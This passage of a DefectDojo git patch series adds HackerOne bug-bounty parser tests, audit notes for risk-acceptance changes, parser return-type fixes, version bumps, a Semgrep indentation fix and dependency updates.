newline at end of file diff --git a/unittests/scans/h1/data_many.json b/unittests/scans/h1/vuln_disclosure_many.json similarity index 100% rename from unittests/scans/h1/data_many.json rename to unittests/scans/h1/vuln_disclosure_many.json diff --git a/unittests/scans/h1/data_one.json b/unittests/scans/h1/vuln_disclosure_one.json similarity index 100% rename from unittests/scans/h1/data_one.json rename to unittests/scans/h1/vuln_disclosure_one.json diff --git a/unittests/scans/h1/data_empty.json b/unittests/scans/h1/vuln_disclosure_zero.json similarity index 100% rename from unittests/scans/h1/data_empty.json rename to unittests/scans/h1/vuln_disclosure_zero.json diff --git a/unittests/tools/test_h1_parser.py b/unittests/tools/test_h1_parser.py index 4b4e6020200..685220ff039 100644 --- a/unittests/tools/test_h1_parser.py +++ b/unittests/tools/test_h1_parser.py @@ -1,24 +1,170 @@ +from dateutil import parser as date_parser + from dojo.models import Test from dojo.tools.h1.parser import H1Parser from unittests.dojo_test_case import DojoTestCase -class TestHackerOneParser(DojoTestCase): +class HackerOneVulnerabilityDisclosureProgramTests(DojoTestCase): + def test_parse_file_with_multiple_vuln_has_multiple_finding(self): + with open("unittests/scans/h1/vuln_disclosure_many.json", encoding="utf-8") as testfile: + parser = H1Parser() + findings = parser.get_findings(testfile, Test()) + self.assertEqual(2, len(findings)) + + def test_parse_file_with_one_vuln_has_one_finding(self): + with open("unittests/scans/h1/vuln_disclosure_one.json", encoding="utf-8") as testfile: + parser = H1Parser() + findings = parser.get_findings(testfile, Test()) + self.assertEqual(1, len(findings)) def test_parse_file_with_no_vuln_has_no_finding(self): - with open("unittests/scans/h1/data_empty.json", encoding="utf-8") as testfile: + with open("unittests/scans/h1/vuln_disclosure_zero.json", encoding="utf-8") as testfile: parser = H1Parser() findings = parser.get_findings(testfile, Test()) self.assertEqual(0, len(findings)) - def test_parse_file_with_one_vuln_has_one_finding(self): - with open("unittests/scans/h1/data_one.json", encoding="utf-8") as testfile: + +class HackerOneBugBountyProgramTests(DojoTestCase): + def test_bug_bounty_hacker_one_many_findings_json(self): + with open("unittests/scans/h1/bug_bounty_many.json", encoding="utf-8") as testfile: + parser = H1Parser() + findings = parser.get_findings(testfile, Test()) + self.assertEqual(4, len(findings)) + with self.subTest(): + finding = findings[0] + self.assertEqual( + "Sensitive Account Balance Information Exposure via example's DaviPlata Payment Link Integration", + finding.title, + ) + self.assertEqual("Medium", finding.severity) + self.assertEqual(date_parser.parse("2024-05-12 04:05:27 UTC"), finding.date) + self.assertTrue(finding.active) + self.assertIn("**Assigned To**: Group example.co Team", finding.description) + self.assertIn("**Weakness Category**: Information Disclosure", finding.description) + self.assertIn("**Reporter**: reporter", finding.description) + with self.subTest(): + finding = findings[1] + self.assertEqual("Acceso no autorizado a soporte premium sin pagar", finding.title) + self.assertEqual("Critical", finding.severity) + self.assertEqual(date_parser.parse("2024-09-10 15:38:20 UTC"), finding.date) + self.assertTrue(finding.active) + self.assertIn("**Reporter**: reporter", finding.description) + with self.subTest(): + finding = findings[2] + self.assertEqual("XSS - stg.pse.mock.example.co", finding.title) + self.assertEqual("Info", finding.severity) + self.assertEqual(date_parser.parse("2024-08-25 07:27:18 UTC"), finding.date) + self.assertEqual(date_parser.parse("2024-08-27 18:19:23 UTC"), finding.mitigated) + self.assertFalse(finding.active) + self.assertTrue(finding.is_mitigated) + self.assertIn("**Reporter**: reporter", finding.description) + with self.subTest(): + finding = findings[3] + self.assertEqual("example.co/File creation via HTTP method PUT", finding.title) + self.assertEqual("Critical", finding.severity) + self.assertEqual(date_parser.parse("2024-07-22 17:54:36 UTC"), finding.date) + self.assertEqual(date_parser.parse("2024-07-22 20:57:56 UTC"), finding.mitigated) + self.assertFalse(finding.active) + self.assertTrue(finding.is_mitigated) + self.assertIn("**Reporter**: reporter", finding.description) + self.assertIn("CVE-2017-12615", finding.unsaved_vulnerability_ids) + + def test_bug_bounty_hacker_one_one_findings_json(self): + with open("unittests/scans/h1/bug_bounty_one.json", encoding="utf-8") as testfile: parser = H1Parser() findings = parser.get_findings(testfile, Test()) self.assertEqual(1, len(findings)) + with self.subTest(): + finding = findings[0] + self.assertEqual( + "Sensitive Account Balance Information Exposure via example's DaviPlata Payment Link Integration", + finding.title, + ) + self.assertEqual("Medium", finding.severity) + self.assertEqual(date_parser.parse("2024-05-12 04:05:27 UTC"), finding.date) + self.assertTrue(finding.active) + self.assertIn("**Assigned To**: Group example.co Team", finding.description) + self.assertIn("**Weakness Category**: Information Disclosure", finding.description) + self.assertIn("**Reporter**: reporter", finding.description) - def test_parse_file_with_multiple_vuln_has_multiple_finding(self): - with open("unittests/scans/h1/data_many.json", encoding="utf-8") as testfile: + def test_bug_bounty_hacker_one_zero_findings_json(self): + with open("unittests/scans/h1/bug_bounty_zero.json", encoding="utf-8") as testfile: parser = H1Parser() findings = parser.get_findings(testfile, Test()) - self.assertEqual(2, len(findings)) + self.assertEqual(0, len(findings)) + + def test_bug_bounty_hacker_one_many_findings_csv(self): + with open("unittests/scans/h1/bug_bounty_many.json", encoding="utf-8") as testfile: + parser = H1Parser() + findings = parser.get_findings(testfile, Test()) + self.assertEqual(4, len(findings)) + with self.subTest(): + finding = findings[0] + self.assertEqual( + "Sensitive Account Balance Information Exposure via example's DaviPlata Payment Link Integration", + finding.title, + ) + self.assertEqual("Medium", finding.severity) + self.assertEqual(date_parser.parse("2024-05-12 04:05:27 UTC"), finding.date) + self.assertTrue(finding.active) + self.assertIn("**Assigned To**: Group example.co Team", finding.description) + self.assertIn("**Weakness Category**: Information Disclosure", finding.description) + self.assertIn("**Reporter**: reporter", finding.description) + with self.subTest(): + finding = findings[1] + self.assertEqual("Acceso no autorizado a soporte premium sin pagar", finding.title) + self.assertEqual("Critical", finding.severity) + self.assertEqual(date_parser.parse("2024-09-10 15:38:20 UTC"), finding.date) + self.assertTrue(finding.active) + self.assertIn("**Reporter**: reporter", finding.description) + with self.subTest(): + finding = findings[2] + self.assertEqual("XSS - stg.pse.mock.example.co", finding.title) + self.assertEqual("Info", finding.severity) + self.assertEqual(date_parser.parse("2024-08-25 07:27:18 UTC"), finding.date) + self.assertEqual(date_parser.parse("2024-08-27 18:19:23 UTC"), finding.mitigated) + self.assertFalse(finding.active) + self.assertTrue(finding.is_mitigated) + self.assertIn("**Reporter**: reporter", finding.description) + with self.subTest(): + finding = findings[3] + self.assertEqual("example.co/File creation via HTTP method PUT", finding.title) + self.assertEqual("Critical", finding.severity) + self.assertEqual(date_parser.parse("2024-07-22 17:54:36 UTC"), finding.date) + self.assertEqual(date_parser.parse("2024-07-22 20:57:56 UTC"), finding.mitigated) + self.assertFalse(finding.active) + self.assertTrue(finding.is_mitigated) + self.assertIn("**Reporter**: reporter", finding.description) + self.assertIn("CVE-2017-12615", finding.unsaved_vulnerability_ids) + + def test_bug_bounty_hacker_one_one_findings_csv(self): + with open("unittests/scans/h1/bug_bounty_one.json", encoding="utf-8") as testfile: + parser = H1Parser() + findings = parser.get_findings(testfile, Test()) + self.assertEqual(1, len(findings)) + with self.subTest(): + finding = findings[0] + self.assertEqual( + "Sensitive Account Balance Information Exposure via example's DaviPlata Payment Link Integration", + finding.title, + ) + self.assertEqual("Medium", finding.severity) + self.assertEqual(date_parser.parse("2024-05-12 04:05:27 UTC"), finding.date) + self.assertTrue(finding.active) + self.assertIn("**Assigned To**: Group example.co Team", finding.description) + self.assertIn("**Weakness Category**: Information Disclosure", finding.description) + self.assertIn("**Reporter**: reporter", finding.description) + + def test_bug_bounty_hacker_one_zero_findings_csv(self): + with open("unittests/scans/h1/bug_bounty_zero.json", encoding="utf-8") as testfile: + parser = H1Parser() + findings = parser.get_findings(testfile, Test()) + self.assertEqual(0, len(findings)) + + +class TestHackerOneParser( + HackerOneVulnerabilityDisclosureProgramTests, + HackerOneBugBountyProgramTests, +): + """Combined unit test runner.""" From ec19ae885cd7d1171854a32deda11a93bea25d10 Mon Sep 17 00:00:00 2001 From: Cody Maffucci <46459665+Maffooch@users.noreply.github.com> Date: Sat, 21 Sep 2024 11:53:24 -0500 Subject: [PATCH 52/62] Risk Exceptions: Add/Remove notes when finding is added/removed from risk exception (#10934) * Risk Exceptions: Add/Remove notes when finding is added/removed from risk exception * Fix Flake8 * Correct tests * Add user ID to finding note * use jira user --- dojo/api_v2/serializers.py | 8 +++-- dojo/api_v2/views.py | 2 +- dojo/engagement/views.py | 6 ++-- dojo/finding/views.py | 16 +++++----- dojo/jira_link/helper.py | 8 ++--- dojo/risk_acceptance/helper.py | 56 ++++++++++++++++++++++++++++++---- 6 files changed, 71 insertions(+), 25 deletions(-) diff --git a/dojo/api_v2/serializers.py b/dojo/api_v2/serializers.py index 10c07b3f3d4..78ea12e7adf 100644 --- a/dojo/api_v2/serializers.py +++ b/dojo/api_v2/serializers.py @@ -1468,7 +1468,8 @@ class RiskAcceptanceSerializer(serializers.ModelSerializer): def create(self, validated_data): instance = super().create(validated_data) - add_findings_to_risk_acceptance(instance, instance.accepted_findings.all()) + user = getattr(self.context.get("request", None), "user", None) + add_findings_to_risk_acceptance(user, instance, instance.accepted_findings.all()) return instance def update(self, instance, validated_data): @@ -1482,11 +1483,12 @@ def update(self, instance, validated_data): findings_to_remove = Finding.objects.filter(id__in=[x.id for x in findings_to_remove]) # Make the update in the database instance = super().update(instance, validated_data) + user = getattr(self.context.get("request", None), "user", None) # Add the new findings - add_findings_to_risk_acceptance(instance, findings_to_add) + add_findings_to_risk_acceptance(user, instance, findings_to_add) # Remove the ones that were not present in the payload for finding in findings_to_remove: - remove_finding_from_risk_acceptance(instance, finding) + remove_finding_from_risk_acceptance(user, instance, finding) return instance @extend_schema_field(serializers.CharField()) diff --git a/dojo/api_v2/views.py b/dojo/api_v2/views.py index b36924640b8..76521f5e009 100644 --- a/dojo/api_v2/views.py +++ b/dojo/api_v2/views.py @@ -654,7 +654,7 @@ def destroy(self, request, pk=None): instance = self.get_object() # Remove any findings on the risk acceptance for finding in instance.accepted_findings.all(): - remove_finding_from_risk_acceptance(instance, finding) + remove_finding_from_risk_acceptance(request.user, instance, finding) # return the response of the object being deleted return super().destroy(request, pk=pk) diff --git a/dojo/engagement/views.py b/dojo/engagement/views.py index 777a5f7a118..ff86435d0cc 100644 --- a/dojo/engagement/views.py +++ b/dojo/engagement/views.py @@ -1250,7 +1250,7 @@ def add_risk_acceptance(request, eid, fid=None): findings = form.cleaned_data["accepted_findings"] - risk_acceptance = ra_helper.add_findings_to_risk_acceptance(risk_acceptance, findings) + risk_acceptance = ra_helper.add_findings_to_risk_acceptance(request.user, risk_acceptance, findings) messages.add_message( request, @@ -1360,7 +1360,7 @@ def view_edit_risk_acceptance(request, eid, raid, edit_mode=False): finding = get_object_or_404( Finding, pk=request.POST["remove_finding_id"]) - ra_helper.remove_finding_from_risk_acceptance(risk_acceptance, finding) + ra_helper.remove_finding_from_risk_acceptance(request.user, risk_acceptance, finding) messages.add_message( request, @@ -1391,7 +1391,7 @@ def view_edit_risk_acceptance(request, eid, raid, edit_mode=False): if not errors: findings = add_findings_form.cleaned_data["accepted_findings"] - ra_helper.add_findings_to_risk_acceptance(risk_acceptance, findings) + ra_helper.add_findings_to_risk_acceptance(request.user, risk_acceptance, findings) messages.add_message( request, diff --git a/dojo/finding/views.py b/dojo/finding/views.py index 4b37ebc8a9a..c6ca73fcad4 100644 --- a/dojo/finding/views.py +++ b/dojo/finding/views.py @@ -991,10 +991,10 @@ def process_finding_form(self, request: HttpRequest, finding: Finding, context: # Handle risk exception related things if "risk_accepted" in context["form"].cleaned_data and context["form"]["risk_accepted"].value(): if new_finding.test.engagement.product.enable_simple_risk_acceptance: - ra_helper.simple_risk_accept(new_finding, perform_save=False) + ra_helper.simple_risk_accept(request.user, new_finding, perform_save=False) else: if new_finding.risk_accepted: - ra_helper.risk_unaccept(new_finding, perform_save=False) + ra_helper.risk_unaccept(request.user, new_finding, perform_save=False) # Save and add new endpoints finding_helper.add_endpoints(new_finding, context["form"]) # Remove unrelated endpoints @@ -1270,7 +1270,7 @@ def close_finding(request, fid): status.last_modified = timezone.now() status.save() # Clear the risk acceptance, if present - ra_helper.risk_unaccept(finding) + ra_helper.risk_unaccept(request.user, finding) # Manage the jira status changes push_to_jira = False @@ -1446,7 +1446,7 @@ def reopen_finding(request, fid): status.last_modified = timezone.now() status.save() # Clear the risk acceptance, if present - ra_helper.risk_unaccept(finding) + ra_helper.risk_unaccept(request.user, finding) # Manage the jira status changes push_to_jira = False @@ -1626,7 +1626,7 @@ def simple_risk_accept(request, fid): if not finding.test.engagement.product.enable_simple_risk_acceptance: raise PermissionDenied - ra_helper.simple_risk_accept(finding) + ra_helper.simple_risk_accept(request.user, finding) messages.add_message( request, messages.WARNING, "Finding risk accepted.", extra_tags="alert-success", @@ -1640,7 +1640,7 @@ def simple_risk_accept(request, fid): @user_is_authorized(Finding, Permissions.Risk_Acceptance, "fid") def risk_unaccept(request, fid): finding = get_object_or_404(Finding, id=fid) - ra_helper.risk_unaccept(finding) + ra_helper.risk_unaccept(request.user, finding) messages.add_message( request, @@ -2851,9 +2851,9 @@ def finding_bulk_update_all(request, pid=None): ): skipped_risk_accept_count += 1 else: - ra_helper.simple_risk_accept(finding) + ra_helper.simple_risk_accept(request.user, finding) elif form.cleaned_data["risk_unaccept"]: - ra_helper.risk_unaccept(finding) + ra_helper.risk_unaccept(request.user, finding) for prod in prods: calculate_grade(prod) diff --git a/dojo/jira_link/helper.py b/dojo/jira_link/helper.py index 3ccff3df814..d01f3bb3343 100644 --- a/dojo/jira_link/helper.py +++ b/dojo/jira_link/helper.py @@ -1623,7 +1623,7 @@ def process_resolution_from_jira(finding, resolution_id, resolution_name, assign owner=finding.reporter, ) finding.test.engagement.risk_acceptance.add(ra) - ra_helper.add_findings_to_risk_acceptance(ra, [finding]) + ra_helper.add_findings_to_risk_acceptance(User.objects.get_or_create(username="JIRA")[0], ra, [finding]) status_changed = True elif jira_instance and resolution_name in jira_instance.false_positive_resolutions: if not finding.false_p: @@ -1633,7 +1633,7 @@ def process_resolution_from_jira(finding, resolution_id, resolution_name, assign finding.mitigated = None finding.is_mitigated = False finding.false_p = True - ra_helper.risk_unaccept(finding) + ra_helper.risk_unaccept(User.objects.get_or_create(username="JIRA")[0], finding) status_changed = True else: # Mitigated by default as before @@ -1645,7 +1645,7 @@ def process_resolution_from_jira(finding, resolution_id, resolution_name, assign finding.mitigated_by, _created = User.objects.get_or_create(username="JIRA") finding.endpoints.clear() finding.false_p = False - ra_helper.risk_unaccept(finding) + ra_helper.risk_unaccept(User.objects.get_or_create(username="JIRA")[0], finding) status_changed = True else: if not finding.active: @@ -1655,7 +1655,7 @@ def process_resolution_from_jira(finding, resolution_id, resolution_name, assign finding.mitigated = None finding.is_mitigated = False finding.false_p = False - ra_helper.risk_unaccept(finding) + ra_helper.risk_unaccept(User.objects.get_or_create(username="JIRA")[0], finding) status_changed = True # for findings in a group, there is no jira_issue attached to the finding diff --git a/dojo/risk_acceptance/helper.py b/dojo/risk_acceptance/helper.py index a1d628b33df..453fccb9f1d 100644 --- a/dojo/risk_acceptance/helper.py +++ b/dojo/risk_acceptance/helper.py @@ -1,4 +1,5 @@ import logging +from contextlib import suppress from dateutil.relativedelta import relativedelta from django.core.exceptions import PermissionDenied @@ -8,7 +9,7 @@ import dojo.jira_link.helper as jira_helper from dojo.celery import app from dojo.jira_link.helper import escape_for_jira -from dojo.models import Finding, Risk_Acceptance, System_Settings +from dojo.models import Dojo_User, Finding, Notes, Risk_Acceptance, System_Settings from dojo.notifications.helper import create_notification from dojo.utils import get_full_url, get_system_setting @@ -102,7 +103,7 @@ def delete(eng, risk_acceptance): risk_acceptance.delete() -def remove_finding_from_risk_acceptance(risk_acceptance, finding): +def remove_finding_from_risk_acceptance(user: Dojo_User, risk_acceptance: Risk_Acceptance, finding: Finding) -> None: logger.debug("removing finding %i from risk acceptance %i", finding.id, risk_acceptance.id) risk_acceptance.accepted_findings.remove(finding) finding.active = True @@ -112,9 +113,20 @@ def remove_finding_from_risk_acceptance(risk_acceptance, finding): finding.save(dedupe_option=False) # best effort jira integration, no status changes post_jira_comments(risk_acceptance, [finding], unaccepted_message_creator) + # Add a note to reflect that the finding was removed from the risk acceptance + if user is not None: + finding.notes.add(Notes.objects.create( + entry=( + f"{Dojo_User.generate_full_name(user)} ({user.id}) removed this finding from the risk acceptance: " + f'"{risk_acceptance.name}" ({get_view_risk_acceptance(risk_acceptance)})' + ), + author=user, + )) + return None -def add_findings_to_risk_acceptance(risk_acceptance, findings): + +def add_findings_to_risk_acceptance(user: Dojo_User, risk_acceptance: Risk_Acceptance, findings: list[Finding]) -> None: for finding in findings: if not finding.duplicate or finding.risk_accepted: finding.active = False @@ -123,11 +135,21 @@ def add_findings_to_risk_acceptance(risk_acceptance, findings): # Update any endpoint statuses on each of the findings update_endpoint_statuses(finding, accept_risk=True) risk_acceptance.accepted_findings.add(finding) + # Add a note to reflect that the finding was removed from the risk acceptance + if user is not None: + finding.notes.add(Notes.objects.create( + entry=( + f"{Dojo_User.generate_full_name(user)} ({user.id}) added this finding to the risk acceptance: " + f'"{risk_acceptance.name}" ({get_view_risk_acceptance(risk_acceptance)})' + ), + author=user, + )) risk_acceptance.save() - # best effort jira integration, no status changes post_jira_comments(risk_acceptance, findings, accepted_message_creator) + return None + @app.task def expiration_handler(*args, **kwargs): @@ -174,6 +196,16 @@ def expiration_handler(*args, **kwargs): risk_acceptance.save() +def get_view_risk_acceptance(risk_acceptance: Risk_Acceptance) -> str: + """Return the full qualified URL of the view risk acceptance page.""" + # Suppressing this error because it does not happen under most circumstances that a risk acceptance does not have engagement + with suppress(AttributeError): + get_full_url( + reverse("view_risk_acceptance", args=(risk_acceptance.engagement.id, risk_acceptance.id)), + ) + return "" + + def expiration_message_creator(risk_acceptance, heads_up_days=0): return "Risk acceptance [({})|{}] with {} findings has expired".format( escape_for_jira(risk_acceptance.name), @@ -267,7 +299,7 @@ def prefetch_for_expiration(risk_acceptances): ) -def simple_risk_accept(finding, perform_save=True): +def simple_risk_accept(user: Dojo_User, finding: Finding, perform_save=True) -> None: if not finding.test.engagement.product.enable_simple_risk_acceptance: raise PermissionDenied @@ -282,9 +314,15 @@ def simple_risk_accept(finding, perform_save=True): # post_jira_comment might reload from database so see unaccepted finding. but the comment # only contains some text so that's ok post_jira_comment(finding, accepted_message_creator) + # Add a note to reflect that the finding was removed from the risk acceptance + if user is not None: + finding.notes.add(Notes.objects.create( + entry=(f"{Dojo_User.generate_full_name(user)} ({user.id}) has risk accepted this finding"), + author=user, + )) -def risk_unaccept(finding, perform_save=True): +def risk_unaccept(user: Dojo_User, finding: Finding, perform_save=True) -> None: logger.debug("unaccepting finding %i:%s if it is currently risk accepted", finding.id, finding) if finding.risk_accepted: logger.debug("unaccepting finding %i:%s", finding.id, finding) @@ -302,6 +340,12 @@ def risk_unaccept(finding, perform_save=True): # post_jira_comment might reload from database so see unaccepted finding. but the comment # only contains some text so that's ok post_jira_comment(finding, unaccepted_message_creator) + # Add a note to reflect that the finding was removed from the risk acceptance + if user is not None: + finding.notes.add(Notes.objects.create( + entry=(f"{Dojo_User.generate_full_name(user)} ({user.id}) removed a risk exception from this finding"), + author=user, + )) def remove_from_any_risk_acceptance(finding): From 3218c641879265634f1614cfbd27b648a2358ea7 Mon Sep 17 00:00:00 2001 From: Cody Maffucci <46459665+Maffooch@users.noreply.github.com> Date: Mon, 23 Sep 2024 11:39:37 -0500 Subject: [PATCH 53/62] Parsers: Specify lists rather than `dict.values()` (#10945) --- dojo/tools/blackduck/parser.py | 2 +- dojo/tools/blackduck_binary_analysis/parser.py | 2 +- dojo/tools/h1/parser.py | 2 +- dojo/tools/intsights/parser.py | 2 +- dojo/tools/mend/parser.py | 2 +- dojo/tools/qualys_webapp/parser.py | 2 +- dojo/tools/sslscan/parser.py | 2 +- dojo/tools/sslyze/parser_xml.py | 2 +- dojo/tools/whitehat_sentinel/parser.py | 2 +- 9 files changed, 9 insertions(+), 9 deletions(-) diff --git a/dojo/tools/blackduck/parser.py b/dojo/tools/blackduck/parser.py index a79e9db9677..12f01a07d0c 100644 --- a/dojo/tools/blackduck/parser.py +++ b/dojo/tools/blackduck/parser.py @@ -78,7 +78,7 @@ def ingest_findings(self, normalized_findings, test): dupes[dupe_key] = finding - return dupes.values() + return list(dupes.values()) def format_title(self, i): if i.channel_version_origin_id is not None: diff --git a/dojo/tools/blackduck_binary_analysis/parser.py b/dojo/tools/blackduck_binary_analysis/parser.py index 7e545e67517..0f38773dd95 100644 --- a/dojo/tools/blackduck_binary_analysis/parser.py +++ b/dojo/tools/blackduck_binary_analysis/parser.py @@ -104,7 +104,7 @@ def ingest_findings(self, sorted_findings, test): findings[unique_finding_key] = finding - return findings.values() + return list(findings.values()) def format_title(self, i): title = f"{i.object_name}: {i.component} {i.version} Vulnerable" diff --git a/dojo/tools/h1/parser.py b/dojo/tools/h1/parser.py index e182af6b762..c386dec04d3 100644 --- a/dojo/tools/h1/parser.py +++ b/dojo/tools/h1/parser.py @@ -100,7 +100,7 @@ def get_vulnerability_disclosure_json_findings(self, tree, test): ) finding.unsaved_endpoints = [] dupes[dupe_key] = finding - return dupes.values() + return list(dupes.values()) def build_description(self, content): date = content["attributes"]["created_at"] diff --git a/dojo/tools/intsights/parser.py b/dojo/tools/intsights/parser.py index e49c61b852f..abd05ee6ef6 100644 --- a/dojo/tools/intsights/parser.py +++ b/dojo/tools/intsights/parser.py @@ -71,4 +71,4 @@ def get_findings(self, file, test): duplicates[dupe_key] = alert if dupe_key not in duplicates: duplicates[dupe_key] = True - return duplicates.values() + return list(duplicates.values()) diff --git a/dojo/tools/mend/parser.py b/dojo/tools/mend/parser.py index 60ad8931098..dee917ce2a1 100644 --- a/dojo/tools/mend/parser.py +++ b/dojo/tools/mend/parser.py @@ -161,4 +161,4 @@ def create_finding_key(f: Finding) -> str: if dupe_key not in dupes: dupes[dupe_key] = finding - return dupes.values() + return list(dupes.values()) diff --git a/dojo/tools/qualys_webapp/parser.py b/dojo/tools/qualys_webapp/parser.py index 59c0d2b855c..840c9bc8709 100644 --- a/dojo/tools/qualys_webapp/parser.py +++ b/dojo/tools/qualys_webapp/parser.py @@ -462,7 +462,7 @@ def qualys_webapp_parser(qualys_xml_file, test, unique, enable_weakness=False): ).values(), ) - return items + return list(items) class QualysWebAppParser: diff --git a/dojo/tools/sslscan/parser.py b/dojo/tools/sslscan/parser.py index 621ded3daf1..9ac284c1267 100644 --- a/dojo/tools/sslscan/parser.py +++ b/dojo/tools/sslscan/parser.py @@ -93,4 +93,4 @@ def get_findings(self, file, test): else: endpoint = Endpoint(host=host, port=port) finding.unsaved_endpoints.append(endpoint) - return dupes.values() + return list(dupes.values()) diff --git a/dojo/tools/sslyze/parser_xml.py b/dojo/tools/sslyze/parser_xml.py index 710b0c73b26..24fe3c9b3cf 100644 --- a/dojo/tools/sslyze/parser_xml.py +++ b/dojo/tools/sslyze/parser_xml.py @@ -161,4 +161,4 @@ def get_findings(self, file, test): host=host, port=port, protocol=protocol, ), ) - return dupes.values() + return list(dupes.values()) diff --git a/dojo/tools/whitehat_sentinel/parser.py b/dojo/tools/whitehat_sentinel/parser.py index eeb97ee8f5e..fe336bf27df 100644 --- a/dojo/tools/whitehat_sentinel/parser.py +++ b/dojo/tools/whitehat_sentinel/parser.py @@ -268,4 +268,4 @@ def _convert_whitehat_sentinel_vulns_to_dojo_finding( finding.unsaved_endpoints = endpoints dupes[dupe_key] = finding - return dupes.values() + return list(dupes.values()) From 57b228e9608c456bce7060ab6022010a397335cf Mon Sep 17 00:00:00 2001 From: DefectDojo release bot Date: Mon, 23 Sep 2024 17:02:51 +0000 Subject: [PATCH 54/62] Update versions in application files --- components/package.json | 2 +- dojo/__init__.py | 2 +- helm/defectdojo/Chart.yaml | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/components/package.json b/components/package.json index 49f5862eecd..3299d3eb89c 100644 --- a/components/package.json +++ b/components/package.json @@ -1,6 +1,6 @@ { "name": "defectdojo", - "version": "2.39.0-dev", + "version": "2.38.3", "license" : "BSD-3-Clause", "private": true, "dependencies": { diff --git a/dojo/__init__.py b/dojo/__init__.py index bac40506f9a..996b03df38c 100644 --- a/dojo/__init__.py +++ b/dojo/__init__.py @@ -4,6 +4,6 @@ # Django starts so that shared_task will use this app. from .celery import app as celery_app # noqa: F401 -__version__ = "2.38.2" +__version__ = "2.38.3" __url__ = "https://github.com/DefectDojo/django-DefectDojo" __docs__ = "https://documentation.defectdojo.com" diff --git a/helm/defectdojo/Chart.yaml b/helm/defectdojo/Chart.yaml index 9bd09f45faf..1e34a710be9 100644 --- a/helm/defectdojo/Chart.yaml +++ b/helm/defectdojo/Chart.yaml @@ -1,8 +1,8 @@ apiVersion: v2 -appVersion: "2.39.0-dev" +appVersion: "2.38.3" description: A Helm chart for Kubernetes to install DefectDojo name: defectdojo -version: 1.6.151-dev +version: 1.6.151 icon: https://www.defectdojo.org/img/favicon.ico maintainers: - name: madchap From eb5903825a004de040c9e66b686e583bb05b2027 Mon Sep 17 00:00:00 2001 From: DefectDojo release bot Date: Mon, 23 Sep 2024 17:26:29 +0000 Subject: [PATCH 55/62] Update versions in application files --- components/package.json | 2 +- dojo/__init__.py | 2 +- helm/defectdojo/Chart.yaml | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/components/package.json b/components/package.json index 3299d3eb89c..49f5862eecd 100644 --- a/components/package.json +++ b/components/package.json @@ -1,6 +1,6 @@ { "name": "defectdojo", - "version": "2.38.3", + "version": "2.39.0-dev", "license" : "BSD-3-Clause", "private": true, "dependencies": { diff --git a/dojo/__init__.py b/dojo/__init__.py index 996b03df38c..82fc1241506 100644 --- a/dojo/__init__.py +++ b/dojo/__init__.py @@ -4,6 +4,6 @@ # Django starts so that shared_task will use this app. from .celery import app as celery_app # noqa: F401 -__version__ = "2.38.3" +__version__ = "2.39.0-dev" __url__ = "https://github.com/DefectDojo/django-DefectDojo" __docs__ = "https://documentation.defectdojo.com" diff --git a/helm/defectdojo/Chart.yaml b/helm/defectdojo/Chart.yaml index 1e34a710be9..1052b312093 100644 --- a/helm/defectdojo/Chart.yaml +++ b/helm/defectdojo/Chart.yaml @@ -1,8 +1,8 @@ apiVersion: v2 -appVersion: "2.38.3" +appVersion: "2.39.0-dev" description: A Helm chart for Kubernetes to install DefectDojo name: defectdojo -version: 1.6.151 +version: 1.6.152-dev icon: https://www.defectdojo.org/img/favicon.ico maintainers: - name: madchap From 2c591f2e9feccbc36abcd9c48e74efafbff4965f Mon Sep 17 00:00:00 2001 From: Ross Esposito Date: Mon, 23 Sep 2024 12:54:07 -0500 Subject: [PATCH 56/62] Fixing merge conflict --- dojo/tools/semgrep/parser.py | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/dojo/tools/semgrep/parser.py b/dojo/tools/semgrep/parser.py index cd32872f379..b7472005daa 100644 --- a/dojo/tools/semgrep/parser.py +++ b/dojo/tools/semgrep/parser.py @@ -140,12 +140,12 @@ def convert_severity(self, val): elif upper_value == "LOW": return "Low" elif upper_value == "INFO": - if "WARNING" == val.upper(): - return "Medium" - if "ERROR" == val.upper() or "HIGH" == val.upper(): - return "High" - if "INFO" == val.upper(): - return "Info" + if "WARNING" == val.upper(): + return "Medium" + if "ERROR" == val.upper() or "HIGH" == val.upper(): + return "High" + if "INFO" == val.upper(): + return "Info" msg = f"Unknown value for severity: {val}" raise ValueError(msg) From 3c54a45e017bf8ff3832edb964401f3ece974f6e Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 23 Sep 2024 13:27:26 -0500 Subject: [PATCH 57/62] Bump boto3 from 1.35.23 to 1.35.24 (#10946) Bumps [boto3](https://github.com/boto/boto3) from 1.35.23 to 1.35.24. - [Release notes](https://github.com/boto/boto3/releases) - [Commits](https://github.com/boto/boto3/compare/1.35.23...1.35.24) --- updated-dependencies: - dependency-name: boto3 dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 322272f10aa..b0c8e28b62b 100644 --- a/requirements.txt +++ b/requirements.txt @@ -69,7 +69,7 @@ django-ratelimit==4.1.0 argon2-cffi==23.1.0 blackduck==1.1.3 pycurl==7.45.3 # Required for Celery Broker AWS (SQS) support -boto3==1.35.23 # Required for Celery Broker AWS (SQS) support +boto3==1.35.24 # Required for Celery Broker AWS (SQS) support netaddr==1.3.0 vulners==2.2.1 fontawesomefree==6.6.0 From 3623253b2cc2368244aabd415bd37da729742905 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 23 Sep 2024 13:28:20 -0500 Subject: [PATCH 58/62] Bump ruff from 0.6.6 to 0.6.7 (#10947) Bumps [ruff](https://github.com/astral-sh/ruff) from 0.6.6 to 0.6.7. - [Release notes](https://github.com/astral-sh/ruff/releases) - [Changelog](https://github.com/astral-sh/ruff/blob/main/CHANGELOG.md) - [Commits](https://github.com/astral-sh/ruff/compare/0.6.6...0.6.7) --- updated-dependencies: - dependency-name: ruff dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> --- requirements-lint.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements-lint.txt b/requirements-lint.txt index 8a66517d3b6..7dbbaa1c419 100644 --- a/requirements-lint.txt +++ b/requirements-lint.txt @@ -1 +1 